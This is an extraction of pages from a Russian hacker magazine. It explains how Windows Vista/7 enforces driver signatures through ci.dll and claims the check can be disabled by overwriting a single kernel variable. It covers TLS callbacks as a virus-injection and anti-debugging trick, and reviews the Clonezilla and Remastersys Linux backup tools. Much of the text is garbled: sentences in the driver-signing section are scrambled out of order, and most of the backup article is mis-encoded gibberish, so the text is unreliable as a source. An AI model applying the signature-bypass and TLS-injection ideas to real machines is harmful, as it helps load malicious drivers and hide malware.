возьмем свою удочку и посмотрим, что можно выудить из этого забавного механизма — Driver Signature Enforcement.
Его «сердцем» является библиотека сi.dll, которая, как всегда, располагается в папке /%systemroot%/system32. Экспортирует она следующие
функции:
XÀÊÅÐ 10 /141 10







CiCheckSignedFile
CiFindPageHashesInCatalog
CiFindPageHashesInSignedFile
CiFreePolicyInfo
CiGetPEInformation
CiInitialize
CiVerifyHashInCatalog

Самая интересная здесь функция — CiInitialize, она импортируется
ядром во время процесса инициализации системы, ее псевдокод выглядит примерно таким образом:
VOID SepInitializeCodeIntegrity()
{
ULONG CiOptions;
{spipped...}
memset( g_CiCallbacks, 0, 3*sizeof ( SIZE_T ));
CiOptions = 4|2;
if(KeLoaderBlock)
{
if(*(ULONG*)(KeLoaderBlock+84))
{
if(SepIsOptionPresent((KeLoaderBlock+84),
L"DISABLE_INTEGRITY_CHECKS"))
CiOptions = 0;
if(SepIsOptionPresent((KeLoaderBlock+84),
L"TESTSIGNING"))
CiOptions |= 8;
}
CiInitialize(CiOptions,(KeLoaderBlock+32),

119

Запомним это и посмотрим на законченный стек вызовов функций на самом раннем этапе инициализации системы: nt!SepInitializeCodeIntegrity nt!SepInitializationPhase1 + 0x1a1 nt!SeInitSystem + 0x29 nt!Phase1InitializationDiscard + 0x7ce nt!Phase1Initialization + 0xd nt!PspSystemThreadStartup + 0x9e nt!KiThreadStartup + 0x19 Как здесь можно увидеть. ни nt!g_CiCallbacks не экспортируются ядром и найти их будет проблематично. что в переводе на общечеловеческий язык соответствует «Windows cannot verify the digital signature of this file». Если последний не равен NULL. после чего с чистой совестью вернет STATUS_SUCCESS. расшифровывать нет необходимости :)) и. CI!CiValidateImageData Интерес для нас представляет SeValidateImageHeader — она проверяет. Все! Вот таким вот нехитрым способом WIndows Vista / 7 проверяет наличие и валидность цифровой подписи. потому что ни nt!g_CiEnabled. самая документированная из самых недокуметированных возможностей Windows. то увидим. g_CiCallbacks[1] = CI!CiValidateImageData. Делает она это следующим образом: Сначала идет проверка переменной nt!g_CiEnabled (ее смысл. Рихтер в своей библии системного программирования приводит такой пример — с каждым потоком в TLS связывается дата и время. RTFM Что ты знаешь о TLS? Thread Local Storage. Если мы полезем вглубь CiInitialize. будет ли загружен драйвер в систему. проверит значение указателя nt!g_CiCallbacks[0]. В момент уничтожения потока можно XÀÊÅÐ 10 /141/ 10 .sys nt!NtCreateSection nt!MmCreateSection nt!MiValidateImageHeader nt!SeValidateImageHeader nt!_g_CiCallbacks[0] ò. то функция выделит в памяти один байт. Вывод: проверка того. что эта функция проверяет валидность драйверов. сделать это будет довольно сложно. Стек вызовов системных функций в этом случае в Vista/7 будет выглядеть следующим образом: nt!MmLoadSystemImage nt!MiObtainSectionForDriver nt!MiCreateSectionForDriver nt!MmCheckSystemImage 120 Windows Boot Manager вернул 0xc0000428 при проверке драйвера tcpip. есть ли цифровая подпись у драйвера. думаю. или локальная память потока — наверное. если она установлена в TRUE. грузящихся при старте). чтобы загрузить драйвер.CODING F8 при загрузке Vista – отключим проверку цифровой подписи &g_CiCallbacks). то процесс загрузки будет остановлен. Если же переменная nt!g_CiEnabled равна FALSE. Если же nt!g_CiCallbacks[0] будет пустым. то она вернет статус 0xc0000428. то вызовет эту функцию и вернет управление. находящихся в Boot Driver List (то есть. когда он был создан. что нужно будет сделать — это переписать в памяти один байт. зависит всего лишь от одной переменной. g_CiCallbacks[2] = CI!CiQueryInformation. Продолжаем рассматривать процесс загрузки драйверов в систему. Правда. } } Самое интересное здесь то. И если кто-либо захочет выключить эту проверку — все. что CiInitialize возвращает обратно в ядро три указателя на функции: g_CiCallbacks[0] = CI!CiValidateImageHeader. SepInitializeCodeIntegrity (а вернее. Итак.å. CiInitialize) создает некие необходимые в дальнейшем условия для успешной загрузки системы. Если во время этого процесса будут обнаружены ошибки. оно обычно используется программистами в многопоточных приложениях. скопирует туда указатель на свой первый аргумент.

XÀÊÅÐ 10 /141 10 Çàêëþ÷åíèå Будем надеяться. автоматически вызываемые системой до передачи управления на точку входа. как объект процесса полностью создан. он легко сможет добавить другие калбэки во время исполнения. поэтому размер данного пространства определяется. От этого он становится еще более продвинутым пользователем :). это позволяет определить наличие отладчика или скрытно выполнить некоторые действия. которая грузится явно через вызов LoadLibrary(Ex). читай ][. в течение которого поток существовал. которые связаны одновременно и с программой в целом. crackme и прочих программ. Что не лежит на поверхности TLS? Что мы о нем не знаем? Реализация механизма TLS в Windows предусматривает два варианта — явный. что прочтение этой статьи смогло сделать тебя продвинутым пользователем компьютера. Откуда поток узнает. который позволяет создавать и использовать так называемые локальные переменные потока. Поэтому в таких случаях в библиотеках DLL следует использовать APIфункции TLS. TlsAlloc и TlsFree). TLS используется в большом количестве протекторов. под которую она заточена. Некоторые вирусы внедряются исключительно путем модифицирования всего четырех байт — указателя на TLS-таблицу. но антивирусы таких вирусов не обнаруживают. защит. вынуждают использовать TLS. Или вообще не обращают внимания на изменение directory table. что. Касперски «Исчерпывающее руководство по приготовлению и взлому TLS» (http:// www. не выходит каменный цветок? посчитать время.asp). и второй. когда код ссылается на нелокальные данные __declspec( thread ). и да пребудет с тобой Сила! z 121 . подобная техника внедрения работает только на той версии операционной системы. для чего при их объявлении используется __declspec(thread) . Пространство глобальных переменных для потока выделяется во время выполнения. TlsSetValue. чтобы разместить TLS. После загрузки библиотеки DLL с помощью функции LoadLibrary возможен сбой в системе всякий раз. то это может привести к сбою защиты при динамической загрузке. объявленных как __declspec(thread) в библиотеке. импортируемых kernel32 (TlsGetValue.ru/magazine/xa/118/080/1. А что делает продвинутый пользователь? Берет отладчик и ковыряет все подряд. Сценарии. доступно разъяснил. Например. Отвечу: при использовании TLS в своих грязных целях следует помнить об одной неочевидной вещи — в операционках до Windows Vista использование переменных. если тебя интересует использование TLS в качестве антиотладочного приема — подробности читай в отличной статье К. какой индекс в глобальном массиве — его? Да. Уф. Blacklight’s TLS callback пытается обмануть отладчик. такие как TlsAlloc. расположенную в памяти (в одной из системных DLL). Blacklight используют некоторые антиотладочные приемы. надеюсь. не выходит. В частности. который можно задействовать набором функций. двигайся вперед. Кстати. можно передать функции потока ThreadProc параметр в виде индекса… но это все известные стороны медали. пусть процесс владеет некоторым массивом. Но что с того? Как TLS можно использовать в контексте компьютерной безопасности? А вот так! PE-формат поддерживает функции обратного вызова (TLS-callback). Это значит. где есть данные.Точно. что ключевое слово __declspec(thread) имеет некоторые ограничения.. вирусов. и с отдельным потоком в частности. При использовании функции LoadLibrary не существует способа расширения этого пространства.. Ты можешь спросить: «В чем же разница между ними?». неявный. начинающиеся с создания callback таблицы TLS (Thread Local Storage). исходя из расчетов требований приложения. если у тебя установлен один калбэк. где находится указатель на команду передачи управления на shell-код. а также требований всех статически компонуемых библиотек DLL. закончится ошибкой Access Violation. Конечно. если библиотека DLL загружается с помощью функции LoadLibrary. они могут изменять таблицу TLS во время исполнения. Если PE-файл имеет свои калбэки. чтобы разрешить объявление локальных переменных потока с ключевым словом __declspec (thread). Почему? Все дело в том. находящихся в сфере наших с тобой общих интересов. Ну что. В общем.xakep. создавая копию главного процесса (fork) до того. Если библиотека DLL объявляет любые нелокальные данные или объекты как __declspec( thread ). Каждый элемент массива вместе с его содержимым соответствует отдельному потоку. Данила-мастер.

50! Ìîæíî ïîñòóïèòü ïðîùå. çàãðóçèëñÿ ñ LiveCD (êîíå÷íî. org ìîæíî íàéòè ñëåäóþùóþ èíôîðìàöèþ: çà 10 ìèíóò Clonezilla SE ðàçâåðíóë ïî ñåòè îáðàç 5. ãäå ÷èñëî N çàâèñèò îò êîëè÷åñòâà èìåþùèõñÿ áîëâàíîê. ìîæíî îãðàíè÷èòüñÿ óòèëèòîé Remastersys Backup (http://www. òî òåáå íå÷åãî áåñïîêîèòüñÿ. ïîòîì âðåìÿ íà âîññòàíîâëåíèå áýêàïà. íî ïðè÷åì çäåñü LiveCD? Îêàçûâàåòñÿ. Îñòàëüíîå âðåìÿ ìîæíî äåëàòü âèä. Ïóñòü íàñòðîéêà îäíîãî êîìïüþòåðà çàéìåò ïîëòîðà ÷àñà (óñòàíîâêà ñèñòåìû + íàñòðîéêà). В этой статье мы поговорим о средствах резервного копирования для твоего любимого тукса. Âîò òåïåðü ïðåäñòàâü. все рассматриваемые средства позволяют создать не просто резервную копию системы. íî ïî ñòàðèíêå ìû çäåñü è äàëåå áóäåì íàçûâàòü åãî LiveCD) è óñòàíîâèë ñèñòåìó âìåñòå ñî âñåìè ïàðàìåòðàìè íà íîâûé âèíò. Íå íóæíî äóìàòü. À âðåìÿ èäåò. èìåííî íà «áîëâàíêè». Åñëè òåáå íå íóæíî òàêîå ìîùíîå ñðåäñòâî. ðàçâå ÷òî. Áåç LiveCD òû áû ïîòðàòèë ïîëòîðà ÷àñà íà êàæäûé êîìïüþòåð. ред. ÷òî òû ñîçäàë îáû÷íûé áýêàï ñ ïîìîùüþ tar/tgz.geekconnection. ýòî äîâîëüíî óäîáíî. Êðîìå òîãî. Íàøà öåëü — ðåçåðâíîå êîïèðîâàíèå ñèñòåìû. ñîçäàòü áýêàï â âèäå LiveCD è «ðàçâåðíóòü» ýòîò áýêàï íà âñåõ îñòàëüíûõ êîìïàõ ñåòè. âñå êîìïüþòåðû îäíîòèïíûå (èñêëþ÷åíèå ñîñòàâëÿþò. Ïðàâäà. Êîãäà ïðåäïðèÿòèå ïîêóïàåò êîìïüþòåðíûé ïàðê. è êîìïüþòåðû íà÷àëüñòâà — ó íèõ äîëæíà áûòü ìîùíàÿ âèäåîêàðòà :)). ðàáîòàþùèõ ïîä óïðàâëåíèåì Windows è FreeBSD. ëèøü áû èõ ðàçìåð íå ïðåâûñèë ðàçìåðà DVD-äèñêà. Ïðåäïîëîæèì. ÷òîáû òû ñìîã îäíîâðåìåííî óñòàíàâëèâàòü ñèñòåìó íà íåñêîëüêî êîìïüþòåðîâ. а LiveCD/DVD. À òåïåðü ïðåäñòàâü.ru «Живой» бэкап линуксового сервера ОБЗОР СРЕДСТВ ДЛЯ РЕЗЕРВНОГО КОПИРОВАНИЯ И СОЗДАНИЯ LIVEDVD/LIVEUSB Все мы помним (любим и скорбим) о добром привидении от Нортона — Norton Ghost. 20.6 Ãá íà 41 êîìïüþòåð ñåòè. Óäîáíî? Äóìàþ. ïîòîìó ÷òî òåáå íóæíî áóäåò ñîçäàòü íåñêîëüêî êîïèé LiveCD. ÷òî áýêàï â âèäå LiveCD ìîæåò èñïîëüçîâàòüñÿ òîëüêî äëÿ êîïèðîâàíèÿ/âîññòàíîâëåíèÿ ôàéëîâ ñàìîé ñèñòåìû. ÷òî íàñòðàèâàåøü êîìïû. Clonezilla ìîæåò èñïîëüçîâàòüñÿ äëÿ áýêàïà êîìïüþòåðîâ. çàðïëàòà íà÷èñëÿåòñÿ! È åùå — ñîçäàííûå «êëîíû» ñèñòåìû ìîæíî èñïîëüçîâàòü â áóäóùåì.  èòîãå âñå êîìïû áûëè íàñòðîåíû âñåãî çà 10 ìèíóò. Çàòåì 122 åùå ìèíóò 40 îæèäàíèÿ. äëÿ òàêîé ñåòåâîé óñòàíîâêè íóæíî ðàçâåðíóòü ñïåöèàëüíûé ñåðâåð. Îäíîçíà÷íî âðåìåíè áóäåò ïîòðà÷åíî áîëüøå. ïîòîìó ÷òî îò òåáÿ òðåáóåòñÿ ââîä âñåãî îäíîé êîìàíäû). È âñå! Íà âñþ ýòó îïåðàöèþ áóäåò ïîòðà÷åíî ïîë÷àñà. Òåáå íóæíî ìèíèìóì 40 ìèíóò íà óñòàíîâêó ñèñòåìû. åñëè êîìïüþòåðíûé ïàðê áóäåò ðàñøèðÿòüñÿ. ýòà óòèëèòà ðàññ÷èòàíà òîëüêî íà Debian è Ubuntu (à òàêæå íà XÀÊÅÐ 10 /141/ 10 . • Âîçìîæíîñòü ñîçäàíèÿ LiveUSB — çàãðóçî÷íàÿ æèâàÿ ôëåøêà ïîíàäîáèòñÿ äëÿ âîññòàíîâëåíèÿ/êëîíèðîâàíèÿ îïåðàöèîíêè íåòáóêà è äðóãèõ êîìïîâ. Более того. äà. ïëþñ îäèí ëèøíèé ðåáóò. òî. À òàê òû íàñòðîèøü ýòè 10 êîìïîâ ïðèìåðíî çà ÷åòûðå ÷àñà. Õîòÿ ìîæíî èñïîëüçîâàòü äâóõñëîéíûå äèñêè (äâóõñòîðîííèå èñïîëüçîâàòü íå óäîáíî). ïîäíÿë âñå ñåòåâûå ñëóæáû.org/remastersys/). Ñðåäñòâà ñîçäàíèÿ LiveCD ïîçâîëÿþò òàêæå ñîçäàòü è çàãðóçî÷íóþ ôëåøêó. Ïîëüçîâàòåëè è íà÷àëüñòâî áóäóò òåáå áëàãîäàðíû çà ñòîëü îïåðàòèâíîå «âîñêðåøåíèå» ñåðâåðà. Äà. À èõ ìîæåò áûòü 10. В мире Windows его можно считать незаменимым (хотя в конкурентах недостатка нет — прим.SYN/ACK Денис Колисниченко dhsilabs@mail. ÷òî ïîçâîëèò óâåëè÷èòü îáúåì ðåçåðâèðóåìîé èíôû. Ïðàâäà. Íà ñàéòå ðàçðàáîò÷èêîâ http://clonezilla. • Ñîçäàåì ñðåäñòâî äëÿ êëîíèðîâàíèÿ ñèñòåìû. ÷òî òåáå íóæíî íàñòðîèòü êàæäûé íîâûé êîìïüþòåð. КАКИЕ СРЕДСТВА МЫ БУДЕМ РАССМАТРИВАТЬ? Ñàìûì ìîùíûì ñðåäñòâîì äëÿ êëîíèðîâàíèÿ òâîåãî òóêñà ÿâëÿåòñÿ Clonezilla. îòðåäàêòèðîâàë èõ êîíôèãè. è íè÷åãî íå äåëàòü. íî è ðàçâåðíóòü ñèñòåìó ïî ñåòè. Çàìåíèë âèíò. çàòåì çàïèñü îáðàçà íà áîëâàíêè. Ìû óáèâàåì âîò ñêîëüêî çàéöåâ ñðàçó: • Ñîçäàåì ñðåäñòâî äëÿ âîññòàíîâëåíèÿ ñèñòåìû. çà÷åì àäìèíó ñðåäñòâà äëÿ ñîçäàíèÿ LiveCD. Ýòîò ïðîäóêò ìîæåò íå òîëüêî ñîçäàòü LiveCD. òû íàñòðîèë ñâîþ ñèñòåìó. Îïÿòü âñå çàíîâî íàñòðàèâàòü? Åñëè òû íàêàíóíå ñîçäàë LiveCD. íî îá ýòîì ïîçæå. ñîçäàíèå LiveCD — åùå ìèíóò 30 (òóò âñå çàâèñèò îò ñïîñîáíîñòåé êîìïüþòåðà. êàê ïðàâèëî. 10 êîìïîâ = 15 ÷àñîâ (äâà ðàáî÷èõ äíÿ). ЗАЧЕМ НУЖНО ВСЕ ЭТО? Äëÿ íà÷àëà îïðåäåëèìñÿ.). Ìîæíî êîïèðîâàòü è ïîëüçîâàòåëüñêèå äàííûå èç /home. Íî çàâòðà èç-çà î÷åðåäíîãî ïåðåïàäà íàïðÿæåíèÿ ñãîðåë âèíò. ýòî áóäåò LiveDVD. Íàñòðîèòü îäèí êîìïüþòåð. è ñðàçó áóäåò íàñòðîåíî N êîìïüþòåðîâ. ãäå íåò DVD -ïðèâîäà. ñåðâåðû — îíè äîëæíû áûòü ìîùíåå.

org/download/sourceforge/ ISO-îáðàç Clonezilla Live è çàïèøè åãî íà áîëâàíêó. Òû óâèäèøü ïðîöåññ çàãðóçêè Debian — òóò âñå êàê îáû÷íî. Ðóññêîãî. à ïîçíàêîìèòüñÿ ñ îñòàëüíûìè âîçìîæíîñòÿìè ïðîãðàììû ìîæíî â äîêóìåíòàöèè èëè íà ñàéòå ðàçðàáîò÷èêîâ. Ñîçäàííûé ôàéë (ôàéëû) áóäåò ñîõðàíåí â êàòàëîãå /home/partimag. êîòîðàÿ íàïðÿìóþ ðàáîòàåò ñ óñòðîéñòâàìè. ïîä êàêîé îïåðàöèîííîé ñèñòåìîé ðàáîòàåò êîìïüþòåð. çàïóñêàåòñÿ ïîä óïðàâëåíèåì ýòîé îïåðàöèîííîé ñèñòåìû è ñîçäàåò ISO-îáðàç ñèñòåìû. óòèëèòà mklivecd (ïîäîáíà Remastersys Backup) èñïîëüçóåòñÿ äëÿ ñîçäàíèÿ LiveCD íà áàçå Mandriva. 6. 5. Âîò è âñå! Êàê âèäèøü. Äàëåå íóæíî âûáðàòü ðàçäåë. XÀÊÅÐ 10 /141/ 10 7. òî äàëåå íóæíî âûáðàòü îáðàç. 3. Ðàññìîòðåòü àáñîëþòíî âñå ïîäîáíûå óòèëèòû ìû íå ìîæåì — æóðíàë-òî âåäü íå ðåçèíîâûé. âñå äîâîëüíî ïðîñòî. Ïîðÿäîê ðàáîòû ñ Remastersys ñëåäóþùèé: òû íàñòðàèâàåøü ñâîþ ñèñòåìó. zip — îáðàç äëÿ çàïèñè íà LiveUSB. REMASTERSYS BACKUP: БЭКАП ДЛЯ DEBIAN/UBUNTU  îòëè÷èå îò Clonezilla. ìîæíî âûáðàòü êîìàíäó Other modes of Clonezilla live è âûáðàòü äðóãîé ðåæèì çàãðóçêè Clonezilla. Ïî÷åìó èìåííî Slackware îïèñàí â ýòîé ñòàòüå? Äà ïîòîìó ÷òî ýòîìó îòëè÷íîìó äèñòðèáóòèâó ïî÷åìó-òî óäåëÿåòñÿ ìàëî âíèìàíèÿ íà ôîíå «ïîïñîâûõ» äèñòðîâ âðîäå Ubuntu. Åñëè òû âûáðàë êîìàíäó recovery-iso-zip äëÿ ñîçäàíèÿ LiveDVD/USB.linuxlive. Òàêæå îáðàç ìîæíî ïîëó÷èòü (èëè çàïèñàòü) ïî SSH. ïîæàëóé. 9. ÷òî îçíà÷àåò ëîêàëüíîå óñòðîéñòâî. ñîçäàåøü ISO-îáðàç. Èòàê. òî íà ýòîò ðàçäåë îí áóäåò ñîõðàíåí. âûáåðè âàðèàíò «Don't touch keymap». Åñëè âîçíèêíóò ïðîáëåìû (íàïðèìåð. Ðåæèì device-device èñïîëüçóåòñÿ äëÿ áýêàïà ðàçäåëà. restoredisk — äëÿ âîññòàíîâëåíèÿ îáðàçà äèñêà íà ëîêàëüíûé äèñê. Êîìàíäà savedisk èñïîëüçóåòñÿ äëÿ ñîõðàíåíèÿ âñåãî äèñêà. Âûáåðè local_ dev. Íóæíî âûáðàòü êîìàíäó Clonezilla live. Ïîäîáíûå óòèëèòû ìîæíî íàéòè è äëÿ äðóãèõ äèñòðèáóòèâîâ. òàê è LiveUSB. Åñëè òû ñîçäàåøü îáðàç. íî òàê êàê ðàñêëàäêó èçìåíÿòü íàì íå íóæíî (à çà÷åì?). íàïðèìåð. ñêàæåì. êîòîðûå ìîãóò èñïîëüçîâàòüñÿ âïîñëåäñòâèè äëÿ ñîçäàíèÿ êàê LiveDVD. both — áóäóò ñîçäàíû îáà ôàéëà. ãäå áóäóò õðàíèòüñÿ îáðàçû. à åñëè âîññòàíàâëèâàåøü îáðàç. Âûáåðè ðåæèì device-image: ñîçäàíèå ôàéëà îáðàçà ðàçäåëà. Ëþáèòåëÿì Slackware ïîäîéäåò ñêðèïò Linux Live (http://www. Åñëè òû âûáðàë êîìàíäó âîññòàíîâëåíèÿ îáðàçà. ðàáîòàþùèé ïîä óïðàâëåíèåì Debian èëè Ubuntu. Îòêðîé ôàéë sources. êîòîðûé íóæíî èñïîëüçîâàòü. Ââîäèì óñòðîéñòâî (èìåíà óñòðîéñòâ ñîîòâåòñòâóþò èìåíàì óñòðîéñòâ â Linux). íà êîòîðîå íóæíî ðàçâåðíóòü îáðàç.org). NFS (Network File System. îñíîâàííûå íà Debian).list Äîáàâü â íåãî ñëåäóþùóþ ñòðîêó: # Åñëè ó òåáÿ óñòàíîâëåí GRUB v1 123 . 2. ïðè ýòîì ñàì áýêàï áóäåò ïîìåùåí íà äðóãîé ðàçäåë. ïîýòîìó îíà íå ïîäîéäåò òåáå. restoreparts — äëÿ âîññòàíîâëåíèÿ îáðàçà ðàçäåëà. Ïðîãðàììà ðàáîòàåò ñ óñòðîéñòâàìè (äèñêàìè. ÷òîáû íå ðàçâåðíóòü îáðàç ðàçäåëà íà âåñü äèñê — ïîòåðÿåøü îñòàëüíûå ðàçäåëû! 11. ïîýòîìó ïðè ñîçäàíèè/ âîññòàíîâëåíèè áýêàïà âñå ðàâíî. Remastersys Backup óñòàíàâëèâàåòñÿ íà êîìïüþòåð. äëÿ ñîçäàíèÿ/âîññòàíîâëåíèÿ áýêàïà íóæíî âûïîëíèòü ñëåäóþùèå äåéñòâèÿ: 1. ñåé÷àñ ìû ðàññìîòðèì ëèøü îäèí èç ïðèìåðîâ åå èñïîëüçîâàíèÿ (à èìåííî — ñîçäàíèå LiveCD è âîññòàíîâëåíèå ñèñòåìû ñ åãî ïîìîùüþ).list: sudo nano /etc/apt/sources. òàê è LiveUSB. êîìàíäà recovery-iso-zip èñïîëüçóåòñÿ äëÿ ñîçäàíèÿ «æèâîãî» äèñêà âîññòàíîâëåíèÿ.äðóãèå äèñòðèáóòèâû. CLONEZILLA: БЕСПЛАТНЫЙ АНАЛОГ NORTON GHOST Clonezilla — ïðîãðàììà íåïðîñòàÿ. ïîêà íå ïðåäâèäèòñÿ. Ñêà÷àé ñ http://clonezilla. êóäà áóäåò ñîõðàíåí îáðàç. Äàëåå íóæíî âûáðàòü ðàñêëàäêó êëàâèàòóðû. Âûáåðè êîìàíäó «Start Clonezilla». èëè îòêóäà îí áóäåò ïðî÷èòàí (â ñëó÷àå âîññòàíîâëåíèÿ ñèñòåìû ïî îáðàçó). Äàëåå íóæíî âûáðàòü îäíó èç êîìàíä. saveparts — äëÿ ñîõðàíåíèÿ îäíîãî èëè íåñêîëüêèõ ðàçäåëîâ äèñêà. òî Clonezilla áóäåò èñêàòü åãî íà ýòîì ðàçäåëå. 8. Ýòîò ñêðèïò ïîçâîëÿåò ñîçäàòü êàê LiveCD. ðàçäåëàìè) íàïðÿìóþ. Fedora èëè Mandriva. åñëè òû èñïîëüçóåøü. óñòàíàâëèâàåøü Remastersys. çàïóñêàåøü Remastersys. Äàëåå íóæíî âûáðàòü ÿçûê. êîòîðûé ïîòîì íóæíî áóäåò çàïèñàòü íà áîëâàíêó. Âîò. ìû è íàçâàëè ñàìîå ãëàâíîå. Áóäü âíèìàòåëåí. ñ âèäåîêàðòîé). 4. òî íóæíî òàêæå âûáðàòü ðåæèì: iso — áóäåò ñîçäàí îáðàç äëÿ çàïèñè íà DVD. Äàëåå íóæíî âûáðàòü. ê ñîæàëåíèþ. ïîä óïðàâëåíèåì êîòîðîé îíà çàïóùåíà. çàãðóçî÷íîå ìåíþ ïðåäñòàâëåíî íèæå. Ïåðâûì äåëîì óñòàíîâèì Remastersys. à íå Need For Speed!) è èç ñåòè MS Windows (samba_server). Çàãðóçèñü ñ áîëâàíêè Clonezilla Live. íóæíî ïðîñòî ïîäîæäàòü. 10.

org/clonezilla-server-edition/ — èñïîëüçîâàíèå Clonezilla Server Edition • http://www. âèäåî).cyberciti. ñîçäàåò ISO-îáðàç äèñòðèáóòèâà. íî è MS Windows. ÷òîáû â äîìàøíåì êàòàëîãå íå áûëî íè÷åãî ëèøíåãî (òîãî. íàïðèìåð. OpenBSD).org/HowTos/PXE/Clonezilla — êàê íàñòðîèòü Clonezilla/DRBL-ñåðâåð íà áàçå CentOS/Fedora • https://wiki. Åñëè òåáå áîëüøå íðàâèòñÿ GUI. Ext4. èíà÷å îí òîæå áóäåò óäàëåí.centos. òî ìîæåøü èñïîëüçîâàòü GUI-âåðñèþ ïðîãðàììû (íè÷åãî îñîáåííîãî îíà èç ñåáÿ íå ïðåäñòàâëÿåò — òîëüêî îêîøêî ñ ïðÿìîóãîëüíûìè íåêðàñèâûìè êíîïêàìè.edubuntu. Ext3. êîòîðûå îáðàçóþòñÿ â ïðîöåññå ñîçäàíèÿ äèñòðèáóòèâà. â òîì ÷èñëå ìåíþ.org/remastersys/ubuntu. íî òîëüêî ïîñëå òîãî. Ìíå áîëüøå íðàâèòñÿ îïöèÿ backup.biz/tips/download-linuxclonezilla-to-clone-system. Mac OS (Intel). Íî òîëüêî óáåäèñü. âêëþ÷àÿ ïîëüçîâàòåëüñêèå äàííûå (êàòàëîã /home). çàäàåò èìÿ ISO-îáðàçà. ãðàôè÷åñêàÿ òåìà.SYN/ACK Загрузочное меню Clonezilla Live deb http://www. ïîýòîìó òû ìîæåøü êëîíèðîâàòü íå òîëüêî Linux. íî è âåñü æåñòêèé äèñê ñî âñåìè ðàçäåëàìè. • iso — èñïîëüçóåòñÿ ïî óìîë÷àíèþ. NTFS. • Ïîääåðæêà GRUB âåðñèé 1 è 2. ÷òî êîìïüþòåðû ïîääåðæèâàþò PXE è Wake-on-LAN. FAT.iso] Ïðîéäåìñÿ ïî îïöèÿì: • backup — ñîçäàíèå ðåçåðâíîé êîïèè äèñòðèáóòèâà.org/ SettingUpClonezillaDRBLonUbuntu — êàê íàñòðîèòü Clonezilla/DRBL-ñåðâåð íà áàçå Ubuntu • http://www. ïîñêîëüêó ïðè ñîçäàíèè îáðàçà ñîõðàíÿþòñÿ è íàñòðîéêè ïîëüçîâàòåëÿ. ìóçûêà. Îáÿçàòåëüíî ââåäè ýòó êîìàíäó ïîñëå ñîçäàíèÿ äèñòðèáóòèâà (äëÿ ýêîíîìèè ìåñòà). • Clonezilla ìîæåò ñîõðàíèòü íå òîëüêî îòäåëüíî âçÿòûé ðàçäåë. ÷òî è backup. êàê ñêîïèðóåøü îáðàç äèñòðèáóòèâà â äðóãîé êàòàëîã. Çàïóñòèòü åå ìîæíî êîìàíäîé sudo remastersys-gui Äëÿ ñîçäàíèÿ LiveUSB â Ubuntu èñïîëüçóåòñÿ ñòàíäàðòíàÿ ïðîãðàììà. ïîçâîëÿþùèìè çàïóñòèòü òó èëè èíóþ ôóíêöèþ ïðîãðàììû). Îñíîâíûå îñîáåííîñòè Clonezilla • Ïîëíîñòüþ áåñïëàòíà (ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GPL). JFS.geekconnection. UFS (FreeBSD. ÷òî ìîæåò óâåëè÷èòü ðàçìåð îáðàçà.iso] — ïîñëåäíèé ïàðàìåòð. • dist — ñîçäàíèå äèñòðèáóòèâíîãî îáðàçà. FreeBSD. ReiserFS. Reiser4. • Âåðñèÿ Clonezilla SE (Server Edition) ïîääåðæèâàåò Multicast äëÿ ìàññîâîãî êëîíèðîâàíèÿ ïî ñåòè. • cdfs — ñîçäàíèå ôàéëà ñ ôàéëîâîé ñèñòåìîé áåç ñîçäàíèÿ ISO-îáðàçà (ïîäõîäèò. VMFS (VMWare ESX). 124 Процесс загрузки Debian • clean — óäàëåíèå âðåìåííûõ ôàéëîâ. • Ïîääåðæèâàåò ôàéëîâûå ñèñòåìû Ext2. NetBSD. •[filename.geekconnection.org/remastersys/ repository karmic/ Ñîõðàíè ôàéë è ââåäè äâå êîìàíäû: sudo apt-get update sudo apt-get install remastersys Ôîðìàò âûçîâà remastersys ñëåäóþùèé: sudo remastersys backup|clean|dist [cdfs|iso] [filename. íî áåç êîïèðîâàíèÿ ïîëüçîâàòåëüñêèõ äàííûõ èç êàòàëîãà /home. • Ïîääåðæêà LVM2 (LVM ver 1 íå ïîääåðæèâàåò). HFS (MacOS).html — îáçîð Clonezilla (äëÿ îáùåãî ðàçâèòèÿ) • http://wiki. åñëè õî÷åøü ñîçäàòü ISO-îáðàç äðóãîé ïðîãðàììîé). çàïóñòèòü êîòîðóþ ìîæíî êîìàíäîé ÑèñòåìàÆ Àäìèíèñòðèðî- Ccûëêè • http://clonezilla. NetBSD è OpenBSD. XFS.org/remastersys/ repository ubuntu/ # Åñëè ó òåáÿ óñòàíîâëåí GRUB2 deb http://www. ôàéë ïîìåùàåòñÿ â êàòàëîã /home/remastersys.geekconnection. html — èñïîëüçîâàíèå Remastersys â Ubuntu XÀÊÅÐ 10 /141/ 10 . Òî æå ñàìîå. ïðè óñëîâèè. ôîí ðàáî÷åãî ñòîëà.

27. íàâåðíîå.33. ãäå NNNN — ñëó÷àéíîå ÷èñëî./build (íàõîäèòñÿ â /tmp) ñ ïðàâàìè root. Äëÿ áýêàïà êîìïîâ. êàê Ubuntu. ñàìûì ïðîñòûì âàðèàíòîì áóäåò èñïîëüçîâàíèå Remastersys Backup. Î÷åíü õîðîøèé äèñòðèáóòèâ. Çàïóñòè åå. SUMMARY Èòàê. íî ó÷èòûâàÿ.  Slackware 13 èñïîëüçóåòñÿ 2. 2 Ãá áóäåò ìàëîâàòî) è íàæìè êíîïêó «Make startup disk».remastersys-gui Программа для создания LiveUSB Выбор языка Clonezilla Выбор раскладки âàíèå Æ Ñîçäàíèå çàãðóçî÷íîãî USB-äèñêà.config. íî îáû÷íî Slackware íå óñòàíàâëèâàåòñÿ íà ñàìûå íîâûå êîìïû ñ 64-ðàçðÿäíûìè ïðîöåññîðàìè.linux-live. • Ñêà÷àé ñêðèïòû Linux Live ñ http://www. çàòî î÷åíü íàäåæíûé.sh. • Çàïóñòè . XÀÊÅÐ 10 /141/ 10 LINUX LIVE: БЭКАП В SLACKWARE Òåïåðü î÷åðåäü äîøëà è äî Slackware. • Îòðåäàêòèðóé . ïðîùå áóäåò èñïîëüçîâàòü Clonezilla äëÿ áýêàïà ñëàêè.org è ðàñïàêóé èõ â /tmp. òåáå çàõî÷åòñÿ ñîáðàòü ÿäðî âðó÷íóþ. åñëè õî÷åøü èçìåíèòü ïåðåìåííûå ïî óìîë÷àíèþ. ïîäêëþ÷è ôëåøêó (4 Ãá èëè áîëüøå. ëèøíèå man'û. À âîò ôàíàòàì Slackware äîëæíû ïîíðàâèòüñÿ ñêðèïòû Live.org). ïîäîéäåò Clonezilla — íàâåðíîå. Äëÿ ñîçäàíèÿ LiveCD â Slackware âûïîëíè ñëåäóþùèå äåéñòâèÿ: • Ñîáåðè (åñëè òû åùå ýòîãî íå ñäåëàë) ìîäóëè ÿäðà: aufs. • Çàïóñòè make_iso. ïîýòîìó. åñëè 